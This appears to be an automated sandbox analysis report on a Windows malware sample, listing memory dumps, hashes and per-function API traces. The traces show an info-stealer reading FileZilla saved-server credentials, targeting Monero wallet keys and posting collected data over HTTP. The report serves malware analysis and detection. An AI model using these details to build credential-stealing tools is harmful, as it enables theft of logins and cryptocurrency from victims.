                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e681af7c328c4f70d106cd5d8dc82e5e1c26ec69cd52a4ff77db2df0806c342
                                • Instruction ID: 31bf7dbb641dad261e574403141abc75368a87c447235ec2339f465464208a22
                                • Opcode Fuzzy Hash: 0e681af7c328c4f70d106cd5d8dc82e5e1c26ec69cd52a4ff77db2df0806c342
                                • Instruction Fuzzy Hash: CA517BB210C608CFC3046E28DC5563AB7E5EBD2710F22493DD6C247B01FBB9185596C7
                                Function 00763EC1 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4af60057d3bd791a5c791b325f6690ebbc6fbf4d0995b654951c414554aaa799
                                • Instruction ID: 8184a971f0089908a74a5ae9c1befff23b153b1dba73f3ab5608e3a5fa90d127
                                • Opcode Fuzzy Hash: 4af60057d3bd791a5c791b325f6690ebbc6fbf4d0995b654951c414554aaa799
                                • Instruction Fuzzy Hash: 2941F7F3A181204BF3189D3DEC8576BBAC9D794324F1B863DEA98D7784E8799C0582C5
                                Function 00867D7C Relevance: .2, Instructions: 162COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1146ff09b2355ba9b082ed24615a2389708d821eeda917863666c30417ba4452
                                • Instruction ID: 72cd9152a5eab924667f5bff64c33a1efd5fb3d625b5960bb98913636312da28
                                • Opcode Fuzzy Hash: 1146ff09b2355ba9b082ed24615a2389708d821eeda917863666c30417ba4452
                                • Instruction Fuzzy Hash: 1F41F7F3A081144FE310A92CDD4573AB7D6EFD4720F2A863DDB98C7780F53999058282
                                Function 008B82DA Relevance: .1, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fb3b31f5cb300bd4bd508664562b4c4093d3d88ab852762a90d36e3464151d16
                                • Instruction ID: edcdd5f0c2774d29205268671ee526563f47d77eb403d2db77c9b1ee488923ba
                                • Opcode Fuzzy Hash: fb3b31f5cb300bd4bd508664562b4c4093d3d88ab852762a90d36e3464151d16
                                • Instruction Fuzzy Hash: EE4136F7608200AFD3006E2DDCC566EFBE9EBA8264F1A053DE2C1C7750F63094118647
                                Function 009726B9 Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d49764a7ee59b944b660f9501deb153fd4baf4ba9c56b330426f0ef6e8443292
                                • Instruction ID: 204b7c70f294e4cbd4548ae96e0e87d75a7ae39cdb264a47c7e54a852ae9f300
                                • Opcode Fuzzy Hash: d49764a7ee59b944b660f9501deb153fd4baf4ba9c56b330426f0ef6e8443292
                                • Instruction Fuzzy Hash: 352106B250C308AFE301BE6ADC4566EFBE5FFA8310F06492CD6D483310E731A5249A97
                                Function 00509750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00500250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00510DBA,00510DB7,00510DB6,00510DB3), ref: 00500362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00500369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00500385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 005003CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 005003DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00500419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00500463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 0050051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 00500532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 0050054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00500562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00500571
                                • lstrcat.KERNEL32(?,url: ), ref: 00500580
                                • lstrcat.KERNEL32(?,00000000), ref: 00500593
                                • lstrcat.KERNEL32(?,00511678), ref: 005005A2
                                • lstrcat.KERNEL32(?,00000000), ref: 005005B5
                                • lstrcat.KERNEL32(?,0051167C), ref: 005005C4
                                • lstrcat.KERNEL32(?,login: ), ref: 005005D3
                                • lstrcat.KERNEL32(?,00000000), ref: 005005E6
                                • lstrcat.KERNEL32(?,00511688), ref: 005005F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00500604
                                • lstrcat.KERNEL32(?,00000000), ref: 00500617
                                • lstrcat.KERNEL32(?,00511698), ref: 00500626
                                • lstrcat.KERNEL32(?,0051169C), ref: 00500635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00510DB2), ref: 0050068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: acb848afd3ddbf111d29fe8b0d70f272c7a18a3bd5cf2288ca3c021948431487
                                • Instruction ID: 10f6afd0eb6d3d78b70e3a1d882494ea5016bbdc93ab2a8cceac3ce656d38ed5
                                • Opcode Fuzzy Hash: acb848afd3ddbf111d29fe8b0d70f272c7a18a3bd5cf2288ca3c021948431487
                                • Instruction Fuzzy Hash: FFD12F71900209ABDB04EBF4DD9AEEE7B78FF94301F408518F102A60D5EF75AA46CB65
                                Function 004F5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F59F8
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,012DE360,00000000,?,012D9BE8,00000000,?,00511A1C), ref: 004F5E71
                                • lstrlen.KERNEL32(00000000), ref: 004F5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004F5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F5E9A
                                • lstrlen.KERNEL32(00000000), ref: 004F5EAF
                                • lstrlen.KERNEL32(00000000), ref: 004F5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004F5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 004F5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004F5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004F5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 004F5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 004F5FBD
                                • HttpOpenRequestA.WININET(00000000,012DE3F0,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F5BF8
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • InternetCloseHandle.WININET(00000000), ref: 004F5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 5188c31d302a22e8761ae3385a4a00346f86b82cb91f02b3626ffdf9e03f4606
                                • Instruction ID: ff3e8b03979a4e61fb6ca0760a81e67670e9cca27a07ae66d9e0929ec7cc24ef
                                • Opcode Fuzzy Hash: 5188c31d302a22e8761ae3385a4a00346f86b82cb91f02b3626ffdf9e03f4606
                                • Instruction Fuzzy Hash: FE122372920219ABDB15EBA0DC9AFEEB778BF54700F408199F106620D1EF742B49CF65
                                Function 004FCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FCF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004FD0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004FD0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD208
                                • lstrcat.KERNEL32(?,00511478), ref: 004FD217
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD22A
                                • lstrcat.KERNEL32(?,0051147C), ref: 004FD239
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD24C
                                • lstrcat.KERNEL32(?,00511480), ref: 004FD25B
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD26E
                                • lstrcat.KERNEL32(?,00511484), ref: 004FD27D
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD290
                                • lstrcat.KERNEL32(?,00511488), ref: 004FD29F
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD2B2
                                • lstrcat.KERNEL32(?,0051148C), ref: 004FD2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 004FD2D4
                                • lstrcat.KERNEL32(?,00511490), ref: 004FD2E3
                                  • Part of subcall function 0050A820: lstrlen.KERNEL32(004F4F05,?,?,004F4F05,00510DDE), ref: 0050A82B
                                  • Part of subcall function 0050A820: lstrcpy.KERNEL32(00510DDE,00000000), ref: 0050A885
                                • lstrlen.KERNEL32(?), ref: 004FD32A
                                • lstrlen.KERNEL32(?), ref: 004FD339
                                  • Part of subcall function 0050AA70: StrCmpCA.SHLWAPI(012D8940,004FA7A7,?,004FA7A7,012D8940), ref: 0050AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 004FD3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 969a3f498261903dff3185bc10cd7cee1179e62670dc4bae683407b0a9da10d7
                                • Instruction ID: 175017923d9de0cee01c440759243b4d5950fd330d2f0e56a930d5c651f5a3cd
                                • Opcode Fuzzy Hash: 969a3f498261903dff3185bc10cd7cee1179e62670dc4bae683407b0a9da10d7
                                • Instruction Fuzzy Hash: 88E15F71910209ABDB04EBA0DD9AEEE7B78BF94301F108158F507A70D1DF39AE45CB66
                                Function 004FC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
